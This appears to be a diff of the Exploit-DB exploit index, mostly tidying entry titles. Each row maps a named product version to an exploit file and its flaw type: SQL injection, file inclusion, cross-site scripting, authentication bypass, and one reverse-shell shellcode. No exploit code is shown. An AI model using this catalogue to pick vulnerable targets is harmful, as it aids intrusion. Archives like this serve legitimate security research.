13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -17896,7 +17899,7 @@ id,file,description,date,author,platform,type,port
|
|||
3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php id' Parameter SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0
|
||||
3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0
|
||||
3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0
|
||||
3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0
|
||||
3089,platforms/asp/webapps/3089.txt,"Quote&Ordering System 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0
|
||||
3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusion",2007-01-06,"Mehmet Ince",php,webapps,0
|
||||
3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion",2007-01-07,Codebreak,php,webapps,0
|
||||
3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - 'AMG_serverpath' Parameter Remote File Inclusion",2007-01-07,beks,php,webapps,0
|
||||
|
@ -18750,7 +18753,7 @@ id,file,description,date,author,platform,type,port
|
|||
4518,platforms/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
|
||||
4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - 'client.php' Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
|
||||
4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,php,webapps,0
|
||||
4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0
|
||||
4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0
|
||||
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Module Newsletter - SQL Injection",2007-10-11,s4mi,php,webapps,0
|
||||
4524,platforms/php/webapps/4524.txt,"Joomla! Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0
|
||||
4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,php,webapps,0
|
||||
|
@ -20985,7 +20988,7 @@ id,file,description,date,author,platform,type,port
|
|||
7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' Parameter SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
|
||||
7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0
|
||||
7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - SQL Injection / Open Proxy",2008-12-12,jdc,php,webapps,0
|
||||
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0
|
||||
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 / PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0
|
||||
7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,php,webapps,0
|
||||
7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
|
||||
7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
|
||||
|
@ -21023,7 +21026,7 @@ id,file,description,date,author,platform,type,port
|
|||
7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - SQL Injection",2008-12-15,ZoRLu,php,webapps,0
|
||||
7484,platforms/asp/webapps/7484.txt,"Click&BaneX - Multiple SQL Injections",2008-12-15,AlpHaNiX,asp,webapps,0
|
||||
7485,platforms/asp/webapps/7485.txt,"clickandemail - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
|
||||
7486,platforms/asp/webapps/7486.txt,"click&rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
|
||||
7486,platforms/asp/webapps/7486.txt,"Click&Rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
|
||||
7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0
|
||||
7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - Database Disclosure",2008-12-16,"Cold Zero",asp,webapps,0
|
||||
7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - 'report.php' SQL Injection",2008-12-16,ka0x,php,webapps,0
|
||||
|
@ -22029,7 +22032,7 @@ id,file,description,date,author,platform,type,port
|
|||
9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0
|
||||
9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0
|
||||
9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0
|
||||
9110,platforms/php/webapps/9110.txt,"WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
|
||||
9110,platforms/php/webapps/9110.txt,"WordPress Core / MU / Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0
|
||||
9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0
|
||||
9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0
|
||||
9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0
|
||||
|
@ -22648,7 +22651,7 @@ id,file,description,date,author,platform,type,port
|
|||
10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
|
||||
10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' Parameter SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10502,platforms/asp/webapps/10502.txt,"Pre Hotels&Resorts Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0
|
||||
|
@ -23290,7 +23293,7 @@ id,file,description,date,author,platform,type,port
|
|||
11623,platforms/php/webapps/11623.txt,"smartplugs 1.3 - SQL Injection showplugs.php",2010-03-03,"Easy Laster",php,webapps,0
|
||||
11624,platforms/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution",2010-03-03,JosS,php,webapps,0
|
||||
11625,platforms/php/webapps/11625.txt,"Joomla! Component com_blog - Directory Traversal",2010-03-03,"DevilZ TM",php,webapps,0
|
||||
11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS - (Survey and Poll) SQL Injection",2010-03-04,SENOT,php,webapps,0
|
||||
11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS (Survey and Poll) - SQL Injection",2010-03-04,SENOT,php,webapps,0
|
||||
11631,platforms/php/webapps/11631.txt,"PHP-Nuke - user.php SQL Injection",2010-03-04,"Easy Laster",php,webapps,0
|
||||
11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,hardware,webapps,0
|
||||
11635,platforms/php/webapps/11635.pl,"OneCMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0
|
||||
|
@ -23686,7 +23689,7 @@ id,file,description,date,author,platform,type,port
|
|||
12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
|
||||
12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0
|
||||
12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0
|
||||
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
|
||||
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password)",2010-04-16,EL-KAHINA,php,webapps,0
|
||||
12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
|
||||
12269,platforms/php/webapps/12269.txt,"Joomla! Component JoltCard 1.2.1 - SQL Injection",2010-04-16,Valentin,php,webapps,0
|
||||
|
@ -23797,7 +23800,7 @@ id,file,description,date,author,platform,type,port
|
|||
12444,platforms/php/webapps/12444.txt,"PHP Video Battle - SQL Injection",2010-04-28,v3n0m,php,webapps,0
|
||||
12445,platforms/php/webapps/12445.txt,"Articles Directory - Authentication Bypass",2010-04-29,Sid3^effects,php,webapps,0
|
||||
12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0
|
||||
12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup",2010-04-29,indoushka,php,webapps,0
|
||||
12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Create and Download Backup",2010-04-29,indoushka,php,webapps,0
|
||||
12448,platforms/php/webapps/12448.txt,"Socialware 2.2 - Upload / Cross-Site Scripting",2010-04-29,Sid3^effects,php,webapps,0
|
||||
12449,platforms/php/webapps/12449.txt,"DZCP (deV!L_z Clanportal) 1.5.3 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0
|
||||
12450,platforms/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 - Cross-Site Scripting",2010-04-29,"High-Tech Bridge SA",windows,webapps,0
|
||||
|
@ -24280,7 +24283,7 @@ id,file,description,date,author,platform,type,port
|
|||
14035,platforms/php/webapps/14035.txt,"Big Forum - 'forum.php?id' SQL Injection",2010-06-24,JaMbA,php,webapps,0
|
||||
14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script - SQL Injection / Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps,0
|
||||
14048,platforms/php/webapps/14048.txt,"2DayBiz - Multiple SQL Injections",2010-06-25,Sangteamtham,php,webapps,0
|
||||
14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips Script 2.7.0 - Cross-Site Request Forgery (Add Admin)",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0
|
||||
14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin)",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0
|
||||
14050,platforms/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion / Cross-Site Scripting",2010-06-25,"Zer0 Thunder",php,webapps,0
|
||||
14051,platforms/php/webapps/14051.txt,"2DayBiz B2B Portal Script - 'selling_buy_leads1.php' SQL Injection",2010-06-25,r45c4l,php,webapps,0
|
||||
14053,platforms/php/webapps/14053.txt,"snipe Gallery Script - SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0
|
||||
|
@ -26596,7 +26599,7 @@ id,file,description,date,author,platform,type,port
|
|||
21588,platforms/cgi/webapps/21588.txt,"BlackBoard 5.0 - Cross-Site Scripting",2002-07-01,"Berend-Jan Wever",cgi,webapps,0
|
||||
21590,platforms/php/webapps/21590.txt,"phpAuction 1/2 - Unauthorized Administrative Access",2002-07-02,ethx,php,webapps,0
|
||||
21609,platforms/cgi/webapps/21609.txt,"Fluid Dynamics Search Engine 2.0 - Cross-Site Scripting",2002-07-10,VALDEUX,cgi,webapps,0
|
||||
21610,platforms/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 - Directory And File Content Disclosure",2002-07-11,JWC,php,webapps,0
|
||||
21610,platforms/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 - Directory and File Content Disclosure",2002-07-11,JWC,php,webapps,0
|
||||
21617,platforms/cgi/webapps/21617.txt,"IMHO Webmail 0.9x - Account Hijacking",2002-07-15,"Security Bugware",cgi,webapps,0
|
||||
21621,platforms/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 - Default Error Page Cross-Site Scripting",2002-07-17,"Peter Gründl",jsp,webapps,0
|
||||
21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting",2002-07-17,Pistone,php,webapps,0
|
||||
|
@ -27827,10 +27830,10 @@ id,file,description,date,author,platform,type,port
|
|||
24667,platforms/php/webapps/24667.txt,"WordPress 1.2 - 'wp-login.php' HTTP Response Splitting",2004-10-07,"Chaotic Evil",php,webapps,0
|
||||
24670,platforms/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board - Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",asp,webapps,0
|
||||
24671,platforms/asp/webapps/24671.txt,"DUclassified 4.x - 'adDetail.asp' Multiple Parameter SQL Injections",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24672,platforms/asp/webapps/24672.txt,"DUclassmate 1.x - account.asp MM-recordId Parameter Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24672,platforms/asp/webapps/24672.txt,"DUclassmate 1.x - 'account.asp MM-recordId' Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24673,platforms/asp/webapps/24673.txt,"DUforum 3.x - Login Form Password Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - messages.asp FOR_ID Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - messageDetail.asp MSG_ID Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - 'messages.asp FOR_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
|
||||
24676,platforms/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - Render.UserLayoutRootNode.uP Cross-Site Scripting",2004-10-13,"Matthew Oyer",php,webapps,0
|
||||
24680,platforms/cfm/webapps/24680.txt,"FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-10-13,steven,cfm,webapps,0
|
||||
24683,platforms/php/webapps/24683.txt,"Pinnacle Systems ShowCenter 1.51 - SettingsBase.php Cross-Site Scripting",2004-10-14,"Secunia Research",php,webapps,0
|
||||
|
@ -32116,7 +32119,7 @@ id,file,description,date,author,platform,type,port
|
|||
30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 - Multiple SQL Injections",2007-12-07,Chrysalid,asp,webapps,0
|
||||
30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 - usergallery.php galleryID Parameter Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0
|
||||
30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 - calendar.php Multiple Parameter Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0
|
||||
30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation And Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps,0
|
||||
30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps,0
|
||||
30860,platforms/asp/webapps/30860.txt,"bttlxe Forum 2.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps,0
|
||||
30861,platforms/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 - mylinks/ratelink.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
|
||||
30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 - adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
|
||||
|
@ -32560,7 +32563,7 @@ id,file,description,date,author,platform,type,port
|
|||
31546,platforms/asp/webapps/31546.txt,"DigiDomain 2.2 - lookup_result.asp domain Parameter Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0
|
||||
31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 - suggest_result.asp Multiple Parameter Cross-Site Scripting",2008-03-27,Linux_Drox,asp,webapps,0
|
||||
31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0
|
||||
31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Inclusion",2008-03-27,XxX,php,webapps,0
|
||||
31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusion",2008-03-27,XxX,php,webapps,0
|
||||
31555,platforms/php/webapps/31555.txt,"Simple Machines Forum (SMF) 1.1.4 - Multiple Remote File Inclusion",2008-03-28,Sibertrwolf,php,webapps,0
|
||||
40770,platforms/php/webapps/40770.txt,"CS-Cart 4.3.10 - XML External Entity Injection",2016-11-16,0x4148,php,webapps,0
|
||||
40353,platforms/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0
|
||||
|
@ -34025,7 +34028,7 @@ id,file,description,date,author,platform,type,port
|
|||
34110,platforms/php/webapps/34110.txt,"PGAUTOPro - SQL Injection / Cross-Site Scripting (2)",2010-06-09,Sid3^effects,php,webapps,0
|
||||
34111,platforms/multiple/webapps/34111.txt,"(GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0
|
||||
34339,platforms/php/webapps/34339.txt,"Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0
|
||||
34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0
|
||||
34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database and Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0
|
||||
34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",linux,webapps,80
|
||||
34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0
|
||||
34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
|
||||
|
@ -34268,7 +34271,7 @@ id,file,description,date,author,platform,type,port
|
|||
34536,platforms/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
34538,platforms/php/webapps/34538.txt,"WordPress Plugin Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80
|
||||
34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Persistent Cross-Site Scripting",2014-09-05,"Fikri Fadzil",php,webapps,80
|
||||
34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - Name and Body Fields HTML Injection Vulnerabilities",2010-08-29,MiND,php,webapps,0
|
||||
34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,php,webapps,0
|
||||
34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - Parameters.php device Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0
|
||||
34544,platforms/php/webapps/34544.txt,"HP Insight Diagnostics Online Edition 8.4 - idstatusframe.php Multiple Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0
|
||||
34545,platforms/php/webapps/34545.txt,"HP Insight Diagnostics Online Edition 8.4 - survey.php category Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0
|
||||
|
@ -34727,7 +34730,7 @@ id,file,description,date,author,platform,type,port
|
|||
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' Parameter SQL Injection",2011-01-16,ShivX,php,webapps,0
|
||||
35233,platforms/multiple/webapps/35233.txt,"B-Cumulus - 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
|
||||
35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
|
||||
35238,platforms/multiple/webapps/35238.txt,"Gogs - (users and repos q pararm) SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0
|
||||
35238,platforms/multiple/webapps/35238.txt,"Gogs - users and repos q SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,0
|
||||
35239,platforms/php/webapps/35239.txt,"phpCMS 2008 V2 - 'data.php' SQL Injection",2011-01-17,R3d-D3V!L,php,webapps,0
|
||||
35245,platforms/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0
|
||||
35246,platforms/php/webapps/35246.py,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - Arbitrary File Download",2014-11-15,"Claudio Viviani",php,webapps,0
|
||||
|
@ -35089,7 +35092,7 @@ id,file,description,date,author,platform,type,port
|
|||
35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80
|
||||
35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0
|
||||
35846,platforms/php/webapps/35846.txt,"WordPress Plugin Pixarbay Images 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
|
||||
35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0
|
||||
35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0
|
||||
35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection",2011-06-13,"Mark Lachniet",asp,webapps,0
|
||||
35853,platforms/php/webapps/35853.php,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (1)",2011-06-13,pentesters.ir,php,webapps,0
|
||||
35854,platforms/php/webapps/35854.pl,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (2)",2011-06-13,pentesters.ir,php,webapps,0
|
||||
|
@ -35332,7 +35335,7 @@ id,file,description,date,author,platform,type,port
|
|||
36214,platforms/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0
|
||||
36215,platforms/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
|
||||
36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0
|
||||
36220,platforms/php/webapps/36220.txt,"Joomla! Component 'com_tree' - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
|
||||
36220,platforms/php/webapps/36220.txt,"Joomla! Component com_tree - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
|
||||
36221,platforms/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
|
||||
36222,platforms/php/webapps/36222.txt,"Joomla! Component 'com_shop' - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
|
||||
36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0
|
||||
|
@ -35799,7 +35802,7 @@ id,file,description,date,author,platform,type,port
|
|||
36925,platforms/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0
|
||||
36926,platforms/php/webapps/36926.txt,"LeKommerce - 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0
|
||||
36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
|
||||
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
|
||||
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
|
||||
36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
|
||||
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx guide' Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
|
@ -36085,7 +36088,7 @@ id,file,description,date,author,platform,type,port
|
|||
37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 - admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
|
||||
37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0
|
||||
37815,platforms/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80
|
||||
39249,platforms/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0
|
||||
39249,platforms/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0
|
||||
37440,platforms/php/webapps/37440.txt,"Watchguard XCS 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0
|
||||
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - Cross-Site Scripting",2015-06-24,hyp3rlinx,php,webapps,80
|
||||
37361,platforms/php/webapps/37361.txt,"WordPress Plugin Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0
|
||||
|
@ -36126,7 +36129,7 @@ id,file,description,date,author,platform,type,port
|
|||
37413,platforms/php/webapps/37413.txt,"Joomla! Component JCal Pro Calendar - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
|
||||
37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,php,webapps,0
|
||||
